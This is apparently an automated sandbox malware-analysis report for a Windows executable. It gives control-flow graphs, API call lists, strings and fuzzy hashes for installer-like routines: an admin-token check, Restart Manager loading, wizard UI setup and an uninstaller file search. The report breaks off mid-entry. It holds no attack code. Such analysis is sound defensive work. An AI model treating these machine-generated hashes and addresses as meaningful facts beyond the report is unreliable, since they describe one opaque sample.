                                                          • Instruction ID: 29ad728ada19ee594bb20a6f10617e7c4442303fd1b73b354b0c7f106615fe65
                                                          • Opcode Fuzzy Hash: c85e02cee53c90be4c09432cdc1bed37a126afc3c982ec3092a00699d9325f6e
                                                          • Instruction Fuzzy Hash: 64928534A0528CDFDB11DFA9C485BDDBBB5AF05308F1480ABE848A7392C7789E45CB59

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1546 42e094-42e0a5 1547 42e0b0-42e0d5 AllocateAndInitializeSid 1546->1547 1548 42e0a7-42e0ab 1546->1548 1549 42e27f-42e287 1547->1549 1550 42e0db-42e0f8 GetVersion 1547->1550 1548->1549 1551 42e111-42e113 1550->1551 1552 42e0fa-42e10f GetModuleHandleA GetProcAddress 1550->1552 1553 42e115-42e123 CheckTokenMembership 1551->1553 1554 42e13a-42e154 GetCurrentThread OpenThreadToken 1551->1554 1552->1551 1555 42e261-42e277 FreeSid 1553->1555 1556 42e129-42e135 1553->1556 1557 42e156-42e160 GetLastError 1554->1557 1558 42e18b-42e1b3 GetTokenInformation 1554->1558 1556->1555 1561 42e162-42e167 call 4031bc 1557->1561 1562 42e16c-42e17f GetCurrentProcess OpenProcessToken 1557->1562 1559 42e1b5-42e1bd GetLastError 1558->1559 1560 42e1ce-42e1f2 call 402648 GetTokenInformation 1558->1560 1559->1560 1563 42e1bf-42e1c9 call 4031bc * 2 1559->1563 1572 42e200-42e208 1560->1572 1573 42e1f4-42e1fe call 4031bc * 2 1560->1573 1561->1549 1562->1558 1566 42e181-42e186 call 4031bc 1562->1566 1563->1549 1566->1549 1575 42e20a-42e20b 1572->1575 1576 42e23b-42e259 call 402660 CloseHandle 1572->1576 1573->1549 1579 42e20d-42e220 EqualSid 1575->1579 1583 42e222-42e22f 1579->1583 1584 42e237-42e239 1579->1584 1583->1584 1587 42e231-42e235 1583->1587 1584->1576 1584->1579 1587->1576
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0CE
                                                          • GetVersion.KERNEL32(00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0EB
                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E104
                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E10A
                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E278,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11F
                                                          • FreeSid.ADVAPI32(00000000,0042E27F,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E272
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 2252812187-1888249752
                                                          • Opcode ID: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                          • Instruction ID: a71ca61110966f780236f7e78469af046a056b7130da329bb4013a210d9377b5
                                                          • Opcode Fuzzy Hash: a9fe6633055198f43e03035385e24ba146a4a62582313a35ed9699780c9b0276
                                                          • Instruction Fuzzy Hash: 65519371B44615EAEF10EAE69C42FBF77ACEB19304F9404BBB901F7281D57899008A79

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1610 450294-4502a1 1611 4502a7-4502b4 GetVersion 1610->1611 1612 450350-45035a 1610->1612 1611->1612 1613 4502ba-4502d0 LoadLibraryA 1611->1613 1613->1612 1614 4502d2-45034b GetProcAddress * 6 1613->1614 1614->1612
                                                          APIs
                                                          • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                          • GetProcAddress.KERNEL32(6E350000,RmStartSession), ref: 004502DD
                                                          • GetProcAddress.KERNEL32(6E350000,RmRegisterResources), ref: 004502F2
                                                          • GetProcAddress.KERNEL32(6E350000,RmGetList), ref: 00450307
                                                          • GetProcAddress.KERNEL32(6E350000,RmShutdown), ref: 0045031C
                                                          • GetProcAddress.KERNEL32(6E350000,RmRestart), ref: 00450331
                                                          • GetProcAddress.KERNEL32(6E350000,RmEndSession), ref: 00450346
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoadVersion
                                                          • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                          • API String ID: 1968650500-3419246398
                                                          • Opcode ID: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                          • Instruction ID: 86b2f7b41730535ff8ff974bf0b660ab9cb9644c053cd973342487371e557a0c
                                                          • Opcode Fuzzy Hash: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                          • Instruction Fuzzy Hash: EF11B3B5510301EBD610FB65BF46A2E37EAE728715B08063FE904962A2CB7C8844CF9C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1674 423c04-423c38 1675 423c3a-423c3b 1674->1675 1676 423c6c-423c83 call 423b60 1674->1676 1678 423c3d-423c59 call 40b434 1675->1678 1681 423ce4-423ce9 1676->1681 1682 423c85 1676->1682 1711 423c5b-423c63 1678->1711 1712 423c68-423c6a 1678->1712 1684 423ceb 1681->1684 1685 423d1f-423d24 1681->1685 1686 423c8b-423c8e 1682->1686 1687 423d48-423d58 1682->1687 1688 423cf1-423cf9 1684->1688 1689 423fa9-423fb1 1684->1689 1692 424092-4240a0 IsIconic 1685->1692 1693 423d2a-423d2d 1685->1693 1690 423c90 1686->1690 1691 423cbd-423cc0 1686->1691 1694 423d63-423d6b call 42418c 1687->1694 1695 423d5a-423d5f 1687->1695 1698 423f0b-423f32 SendMessageA 1688->1698 1699 423cff-423d04 1688->1699 1701 42414a-424152 1689->1701 1706 423fb7-423fc2 call 4181d8 1689->1706 1702 423c96-423c99 1690->1702 1703 423dee-423dfe call 423b7c 1690->1703 1707 423da1-423da8 1691->1707 1708 423cc6-423cc7 1691->1708 1700 4240a6-4240b1 GetFocus 1692->1700 1692->1701 1704 423d33-423d34 1693->1704 1705 4240ce-4240e3 call 424848 1693->1705 1694->1701 1709 423d70-423d78 call 4241d4 1695->1709 1710 423d61-423d84 call 423b7c 1695->1710 1698->1701 1713 424042-42404d 1699->1713 1714 423d0a-423d0b 1699->1714 1700->1701 1722 4240b7-4240c0 call 41efec 1700->1722 1715 424169-42416f 1701->1715 1723 423e16-423e32 PostMessageA call 423b7c 1702->1723 1724 423c9f-423ca2 1702->1724 1703->1701 1717 4240e5-4240ec 1704->1717 1718 423d3a-423d3d 1704->1718 1705->1701 1706->1701 1767 423fc8-423fd7 call 4181d8 IsWindowEnabled 1706->1767 1707->1701 1727 423dae-423db5 1707->1727 1728 423f37-423f3e 1708->1728 1729 423ccd-423cd0 1708->1729 1709->1701 1710->1701 1711->1715 1712->1676 1712->1678 1713->1701 1733 424053-424065 1713->1733 1730 423d11-423d14 1714->1730 1731 42406a-424075 1714->1731 1744 424103-424116 call 424524 1717->1744 1745 4240ee-424101 call 4244cc 1717->1745 1734 423d43 1718->1734 1735 424118-42411f 1718->1735 1722->1701 1782 4240c6-4240cc SetFocus 1722->1782 1723->1701 1741 423ca8-423cab 1724->1741 1742 423e9d-423ea4 1724->1742 1727->1701 1747 423dbb-423dc1 1727->1747 1728->1701 1737 423f44-423f49 call 404e54 1728->1737 1748 423cd6-423cd9 1729->1748 1749 423e37-423e57 call 423b7c 1729->1749 1753 423d1a 1730->1753 1754 423f4e-423f56 1730->1754 1731->1701 1756 42407b-42408d 1731->1756 1733->1701 1755 424143-424144 call 423b7c 1734->1755 1751 424132-424141 1735->1751 1752 424121-424130 1735->1752 1737->1701 1762 423cb1-423cb2 1741->1762 1763 423dc6-423dd4 IsIconic 1741->1763 1764 423ea6-423eb9 call 423b0c 1742->1764 1765 423ed7-423ee8 call 423b7c 1742->1765 1744->1701 1745->1701 1747->1701 1768 423e03-423e11 call 424170 1748->1768 1769 423cdf 1748->1769 1795 423e7b-423e98 call 423a7c PostMessageA 1749->1795 1796 423e59-423e76 call 423b0c PostMessageA 1749->1796 1751->1701 1752->1701 1753->1755 1754->1701 1780 423f5c-423f63 1754->1780 1791 424149 1755->1791 1756->1701 1783 423cb8 1762->1783 1784 423d89-423d91 1762->1784 1773 423de2-423de9 call 423b7c 1763->1773 1774 423dd6-423ddd call 423bb8 1763->1774 1808 423ecb-423ed2 call 423b7c 1764->1808 1809 423ebb-423ec5 call 41ef50 1764->1809 1802 423eea-423ef0 call 41ee9c 1765->1802 1803 423efe-423f06 call 423a7c 1765->1803 1767->1701 1799 423fdd-423fec call 4181d8 IsWindowVisible 1767->1799 1768->1701 1769->1755 1773->1701 1774->1701 1780->1701 1794 423f69-423f78 call 4181d8 IsWindowEnabled 1780->1794 1782->1701 1783->1755 1784->1701 1797 423d97-423d9c call 422c44 1784->1797 1791->1701 1794->1701 1824 423f7e-423f94 call 412308 1794->1824 1795->1701 1796->1701 1797->1701 1799->1701 1825 423ff2-42403d GetFocus call 4181d8 SetFocus call 415238 SetFocus 1799->1825 1822 423ef5-423ef8 1802->1822 1803->1701 1808->1701 1809->1808 1822->1803 1824->1701 1830 423f9a-423fa4 1824->1830 1825->1701 1830->1701
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50d408d7c884e6e1e9eef83812aacce54c36a632f8e4c3c09f50c6ce0f1de6a1
                                                          • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                          • Opcode Fuzzy Hash: 50d408d7c884e6e1e9eef83812aacce54c36a632f8e4c3c09f50c6ce0f1de6a1
                                                          • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2185 4671cc-4671e2 2186 4671e4-4671e7 call 402d30 2185->2186 2187 4671ec-4672a3 call 494c88 call 402b30 * 6 2185->2187 2186->2187 2204 4672a5-4672cc call 414634 2187->2204 2205 4672e0-4672f9 2187->2205 2209 4672d1-4672db call 4145f4 2204->2209 2210 4672ce 2204->2210 2211 467336-467344 call 494f90 2205->2211 2212 4672fb-467322 call 414614 2205->2212 2209->2205 2210->2209 2220 467346-467355 call 494dd8 2211->2220 2221 467357-467359 call 494efc 2211->2221 2218 467327-467331 call 4145d4 2212->2218 2219 467324 2212->2219 2218->2211 2219->2218 2226 46735e-4673b1 call 4948ec call 41a3c8 * 2 2220->2226 2221->2226 2233 4673c2-4673d7 call 45142c call 414b10 2226->2233 2234 4673b3-4673c0 call 414b10 2226->2234 2240 4673dc-4673e3 2233->2240 2234->2240 2241 4673e5-467426 call 4146b4 call 4146f8 call 420f90 call 420fbc call 420b60 call 420b8c 2240->2241 2242 46742b-4678b1 call 494d28 call 49504c call 414614 * 3 call 4146b4 call 4145d4 * 3 call 460a24 call 460a3c call 460a48 call 460a90 call 460a24 call 460a3c call 460a48 call 460a90 call 460a3c call 460a90 LoadBitmapA call 41d6a8 call 460a60 call 460a78 call 466fa8 call 468abc call 466628 call 40357c call 414b10 call 466960 call 466968 call 466628 call 40357c * 2 call 414b10 call 468abc call 466628 call 414b10 call 466960 call 466968 call 414b10 * 2 call 468abc call 414b10 * 2 call 466960 call 4145f4 call 466960 call 4145f4 call 468abc call 414b10 call 466960 call 466968 call 468abc call 414b10 call 466960 call 4145f4 * 2 call 414b10 call 466960 call 4145f4 2240->2242 2241->2242 2372 4678b3-46790b call 4145f4 call 414b10 call 466960 call 4145f4 2242->2372 2373 46790d-467926 call 414a3c * 2 2242->2373 2380 46792b-4679dc call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2372->2380 2373->2380 2399 467a16-467c4c call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 4181d8 call 42ed30 call 414b10 call 494d28 call 49504c call 414614 call 466628 call 414b10 call 466960 call 4145f4 call 466628 call 468abc call 466628 call 414b10 call 466960 call 4145f4 call 466968 call 466628 call 414b10 call 466960 2380->2399 2400 4679de-4679f9 2380->2400 2461 467c4e-467c57 2399->2461 2462 467c8d-467d46 call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2399->2462 2401 4679fe-467a11 call 4145f4 2400->2401 2402 4679fb 2400->2402 2401->2399 2402->2401 2461->2462 2463 467c59-467c88 call 414a3c call 466968 2461->2463 2480 467d80-4681a1 call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 414b10 call 494d28 call 49504c call 414614 call 414b10 call 466628 call 468abc call 466628 call 414b10 call 466960 call 466968 call 42bbc8 call 49505c call 44e8a8 call 466628 call 468abc call 466628 call 468abc call 466628 call 468abc * 2 call 414b10 call 466960 call 466968 call 468abc call 4948ec call 41a3c8 call 466628 call 40357c call 414b10 call 466960 call 4145f4 call 414b10 * 2 call 49505c call 403494 call 40357c * 2 call 414b10 2462->2480 2481 467d48-467d63 2462->2481 2463->2462 2580 4681c5-4681cc 2480->2580 2581 4681a3-4681c0 call 44ffb0 call 45010c 2480->2581 2482 467d65 2481->2482 2483 467d68-467d7b call 4145f4 2481->2483 2482->2483 2483->2480 2583 4681f0-4681f7 2580->2583 2584 4681ce-4681eb call 44ffb0 call 45010c 2580->2584 2581->2580 2586 46821b-468261 call 4181d8 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468bb0 2583->2586 2587 4681f9-468216 call 44ffb0 call 45010c 2583->2587 2584->2583 2601 468263-46826a 2586->2601 2602 46827b 2586->2602 2587->2586 2603 468277-468279 2601->2603 2604 46826c-468275 2601->2604 2605 46827d-46828c 2602->2605 2603->2605 2604->2602 2604->2603 2606 4682a6 2605->2606 2607 46828e-468295 2605->2607 2610 4682a8-4682c2 2606->2610 2608 468297-4682a0 2607->2608 2609 4682a2-4682a4 2607->2609 2608->2606 2608->2609 2609->2610 2611 46836b-468372 2610->2611 2612 4682c8-4682d1 2610->2612 2615 468405-468413 call 414b10 2611->2615 2616 468378-46839b call 47bb50 call 403450 2611->2616 2613 4682d3-46832a call 47bb50 call 414b10 call 47bb50 call 414b10 call 47bb50 call 414b10 2612->2613 2614 46832c-468366 call 414b10 * 3 2612->2614 2613->2611 2614->2611 2622 468418-468421 2615->2622 2635 4683ac-4683c0 call 403494 2616->2635 2636 46839d-4683aa call 47bcf0 2616->2636 2626 468427-46843f call 429fd0 2622->2626 2627 468531-468560 call 42b964 call 44e834 2622->2627 2644 4684b6-4684ba 2626->2644 2645 468441-468445 2626->2645 2661 468566-46856a 2627->2661 2662 46860e-468612 2627->2662 2657 4683d2-468403 call 42c7fc call 42cbb8 call 403494 call 414b10 2635->2657 2658 4683c2-4683cd call 403494 2635->2658 2636->2657 2650 4684bc-4684c5 2644->2650 2651 46850a-46850e 2644->2651 2652 468447-468481 call 40b434 call 47bb50 2645->2652 2650->2651 2659 4684c7-4684d2 2650->2659 2655 468522-46852c call 42a054 2651->2655 2656 468510-468520 call 42a054 2651->2656 2712 468483-46848a 2652->2712 2713 4684b0-4684b4 2652->2713 2655->2627 2656->2627 2657->2622 2658->2657 2659->2651 2671 4684d4-4684d8 2659->2671 2663 46856c-46857e call 40b434 2661->2663 2664 468614-46861b 2662->2664 2665 468691-468695 2662->2665 2691 4685b0-4685e7 call 47bb50 call 44cb04 2663->2691 2692 468580-4685ae call 47bb50 call 44cbd4 2663->2692 2664->2665 2674 46861d-468624 2664->2674 2675 468697-4686ae call 40b434 2665->2675 2676 4686fe-468707 2665->2676 2680 4684da-4684fd call 40b434 call 406ab4 2671->2680 2674->2665 2685 468626-468631 2674->2685 2706 4686b0-4686ec call 40b434 call 469824 * 2 call 4696c4 2675->2706 2707 4686ee-4686fc call 469824 2675->2707 2683 468726-46873b call 466d08 call 466a84 2676->2683 2684 468709-468721 call 40b434 call 469824 2676->2684 2723 468504-468508 2680->2723 2724 4684ff-468502 2680->2724 2737 46878d-468797 call 414a3c 2683->2737 2738 46873d-468760 call 42a038 call 40b434 2683->2738 2684->2683 2685->2683 2694 468637-46863b 2685->2694 2739 4685ec-4685f0 2691->2739 2692->2739 2705 46863d-468653 call 40b434 2694->2705 2734 468686-46868a 2705->2734 2735 468655-468681 call 42a054 call 469824 call 4696c4 2705->2735 2706->2683 2707->2683 2712->2713 2725 46848c-46849e call 406ab4 2712->2725 2713->2644 2713->2652 2723->2651 2723->2680 2724->2651 2725->2713 2748 4684a0-4684aa 2725->2748 2734->2705 2740 46868c 2734->2740 2735->2683 2749 46879c-4687bb call 414a3c 2737->2749 2763 468762-468769 2738->2763 2764 46876b-46877a call 414a3c 2738->2764 2746 4685f2-4685f9 2739->2746 2747 4685fb-4685fd 2739->2747 2740->2683 2746->2747 2753 468604-468608 2746->2753 2747->2753 2748->2713 2754 4684ac 2748->2754 2765 4687e5-468808 call 47bb50 call 403450 2749->2765 2766 4687bd-4687e0 call 42a038 call 469984 2749->2766 2753->2662 2753->2663 2754->2713 2763->2764 2769 46877c-46878b call 414a3c 2763->2769 2764->2749 2782 468824-46882d 2765->2782 2783 46880a-468813 2765->2783 2766->2765 2769->2749 2785 468843-468853 call 403494 2782->2785 2786 46882f-468841 call 403684 2782->2786 2783->2782 2784 468815-468822 call 47bcf0 2783->2784 2793 468865-46887c call 414b10 2784->2793 2785->2793 2786->2785 2794 468855-468860 call 403494 2786->2794 2798 4688b2-4688bc call 414a3c 2793->2798 2799 46887e-468885 2793->2799 2794->2793 2805 4688c1-4688e6 call 403400 * 3 2798->2805 2800 468887-468890 2799->2800 2801 468892-46889c call 42b0dc 2799->2801 2800->2801 2803 4688a1-4688b0 call 414a3c 2800->2803 2801->2803 2803->2805
                                                          APIs
                                                            • Part of subcall function 00494DD8: GetWindowRect.USER32(00000000), ref: 00494DEE
                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046759B
                                                            • Part of subcall function 0041D6A8: GetObjectA.GDI32(?,00000018,004675B5), ref: 0041D6D3
                                                            • Part of subcall function 00466FA8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                            • Part of subcall function 00466968: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                            • Part of subcall function 0049505C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495066
                                                            • Part of subcall function 0042ED30: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                            • Part of subcall function 0042ED30: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                            • Part of subcall function 00494D28: 73A1A570.USER32(00000000,?,?,?), ref: 00494D4A
                                                            • Part of subcall function 00494D28: SelectObject.GDI32(?,00000000), ref: 00494D70
                                                            • Part of subcall function 00494D28: 73A1A480.USER32(00000000,?,00494DCE,00494DC7,?,00000000,?,?,?), ref: 00494DC1
                                                            • Part of subcall function 0049504C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495056
                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0222EEC8,02230C28,?,?,02230C58,?,?,02230CA8,?), ref: 00468225
                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468236
                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046824E
                                                            • Part of subcall function 0042A054: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A06A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                          • String ID: $(Default)$STOPIMAGE
                                                          • API String ID: 3271511185-770201673
                                                          • Opcode ID: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                          • Instruction ID: b2f63b4b9f8df581d735fd8ef5c85857eef1c350e3dafc85bc3b179d47d789c4
                                                          • Opcode Fuzzy Hash: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                          • Instruction Fuzzy Hash: FCF2D6387005148FCB00EB69D9D5F9973F1BF49304F1582BAE9049B36ADB74AC46CB9A
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID: unins$unins???.*
                                                          • API String ID: 3541575487-1009660736
                                                          • Opcode ID: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                          • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                          • Opcode Fuzzy Hash: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                          • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                          • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileFindFirstLast
                                                          • String ID:
                                                          • API String ID: 873889042-0
                                                          • Opcode ID: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                          • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                          • Opcode Fuzzy Hash: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                          • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                          APIs
                                                          • GetVersion.KERNEL32(000003DB,0046DF9A), ref: 0046DF0E
                                                          • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,000003DB,0046DF9A), ref: 0046DF2A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateInstanceVersion
                                                          • String ID:
                                                          • API String ID: 1462612201-0
                                                          • Opcode ID: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                          • Instruction ID: 830c4b43a8f201c084d489d1d0538b8be171f1220f730b3634288a605713aaeb
                                                          • Opcode Fuzzy Hash: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                          • Instruction Fuzzy Hash: 08F0A031B853009EEB14E7A9DC46B4A37C0BB65328F4000BBF044972D2E3AC8890875F
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                          Memory Dump Source
